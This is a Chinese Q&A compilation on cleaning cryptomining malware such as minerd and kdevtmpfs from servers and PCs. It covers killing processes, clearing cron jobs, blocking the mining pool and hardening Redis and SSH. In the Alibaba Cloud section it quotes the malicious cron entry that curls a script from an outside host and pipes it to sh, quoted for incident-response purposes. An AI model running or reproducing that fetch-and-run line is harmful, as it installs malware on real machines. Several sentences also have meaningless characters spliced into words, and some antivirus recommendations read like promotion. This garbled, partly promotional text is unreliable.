服务器中的挖矿软件怎么清除_阿里云windows服务器中了挖矿的病毒怎么清理

　　1. miner挖矿木马该怎么清除

　　miner挖矿木马这种病毒现在经常遇到，在一般情况下使用电脑管家的杀毒功能时无法查杀。

　　这时需要重启电脑按F8进入电脑的安全模春迟姿式，在安全模式下，使用电脑旦嫌管家的病毒查杀，扒绝给电脑杀毒，在一般情况下的杀毒软件可以查杀到此病毒。

　　miner挖矿木马是消耗用户的电脑资源，进行挖矿，导致用户电脑资源和性能变低，一般看不出来，但是显卡或CPU占用很高，是电脑后台自行消耗显卡与CPU资源的木马病毒。现在十分常见。

　　2. 记一次清理服务器挖矿程序注入kdevtmpfs

　　前几天突然发现公司服务器很卡，CPU经常飙到200%；网站服务被自动停止，甚至服务器崩溃；于是进行排查，发现一个名为：kdevtmpfs的进程占用了180%多的CPU，吓了一跳，于是赶紧排查问题：首先查到这个进程并不少我们服务器用到的进程，于是在网上查找这个问题，发现很多人都遇到过，于是根据网上的一个教程开始清理：

　　1、删除掉/tmp文件下的kdevtmpfs文件；删除掉kdevtmpfs对应的进程，清理掉定时任务；（无效，几分钟后依然会自动重启，自动在定时任务新增定时任务）（ https://blog.csdn.net/qq503758762/article/details/103714342 ）

　　2、修改定时任务，不允许新增定时任务，复述1的步骤；（哗枝无效，依然会自动重新启动）；

　　3、经历上述两个方法都无效之后，做了以下操作：a、先用top命令查看进程号；b、根据systemctl status进程号命令，查看该进程对应的父进程；把对应进程下的程序都干掉；重复几次发现都是一个叫做kingsfdt的进程会和这个kdevtmpfs同时启动；c、查看kingsfdt的进程，乱旅敏发现这也是一个陌生的进程，先不kill掉;d:查看系统防火墙，发现对应的23549端口不知道什么时候开放的，并且对应的是kingsfdt这个进程，于是果断把这个进程干掉，同时把端口号封掉；e、再回头删除tmp下的kdevtmpfs文件，再依次删除两个陌生进程；f、登录AWS控制台，把ssh端口改掉，22端口封掉；进入ssh修改root密码，设定只镇和能本地登录；重启服务器；观察了一天，发现服务稳定了，系统也正常运行了，CPU也正常了。开心。

　　3. windows服务器的挖矿进程怎么关闭删除

　　这种病毒腾讯安全提到过

　　可以去下载安装一个腾讯御点

　　打开之后，使用里面的病毒查杀功能，直接就可以查杀这种电脑病毒了

　　4. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

　　1. 关闭访问挖矿服务器的访问

　　iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

　　2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

　　3. pkill minerd ,杀掉进程

　　4. service stop crond 或者 crontab -r 删除所有的执行计划

　　5. 执行top，查看了一会，没有再发现minerd 进程了。

　　6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

　　下载脚本的语句：

　　*/5 * * * * curl -fsSL https://www.haveabitchin.com/pm.sh？0105010 | sh

　　病毒文件内容如下，感兴趣的可以研究下：

　　View Code

　　解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，https://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

　　1. 修复 redis 的后门,

　　配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

　　配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

　　配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

　　好消息是Redis作者表示将会开发“real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

　　2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

　　3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

　　5. 我网上买了一个重装系统U盘，重装系统之后电脑里有一个恶意挖矿软件，请问把这个卸载了就可以了吗

　　直接卸载是不行的，建议“开始”-“运行”，输入：regedit，打开windows注册表，点击上方：“编辑”-“查找”（不要勾选全字匹配，其他都勾上），输入内容：lovecloud，然后将注册表中所有与该内容有关的找出，全部删掉。

　　你卸载掉该恶意软件，同时在注册表中搜不出任何与lovecloud有关的项，才能确定删除干净了。

　　6. 阿里云windows服务器如何去除挖矿病毒

　　找到进程，然后找到他文件路径，干掉进程，删掉文件。

　　另外找找其他可疑进程，避免病毒有守护进程或者其他隐藏进程

　　7. 服务器被检测出挖矿

　　有位朋友说，他服务器使用的好好的，服务商突然封了他服务器，说是被检测出挖矿，这位朋友一脸懵“我开游戏的，挖什么矿”。突然地关停服务器导致这位朋友损失惨重，那么为什么会被检测出挖矿，以及怎么处理呢？感兴趣的话就继续往下看吧~

　　遇到以上问题，需要先找服务器商对其说明实际情况，配合他们排查，基本上就是中了挖矿病毒。

　　最简单的方法就是重装系统，但是系统盘数据都会清空，这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统，需要把自己的文件扫毒一遍确认安全后再导入服务器。

　　但是服务器里如果有很多重要的文件还有比较难配置的环境，那就需要排查删除挖矿程序，全盘扫毒，删除可疑文件，一个个修复病毒对系统的修改。

　　防范建议：

　　1.尽量不要使用默认密码和端口，改一个比较复杂的密码

　　2.可以使用宝塔面板登陆服务器

　　3.系统自带的防火墙、安全防护都不要关闭

　　8. 可可软件总是在后台运行挖矿病毒软件怎么清理

　　可可自动发软件是个骗子，软件都是病毒

　　9. mac中了挖矿木马，该怎么清除啊

　　卡巴斯基或者avast的Mac版下载下来全盘扫描，上面两回复绝对是无脑推广

　　10. 阿里云windows服务器中了挖矿的病毒怎么清理

　　光删除没用的，因为没有解决好漏洞。

　　建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。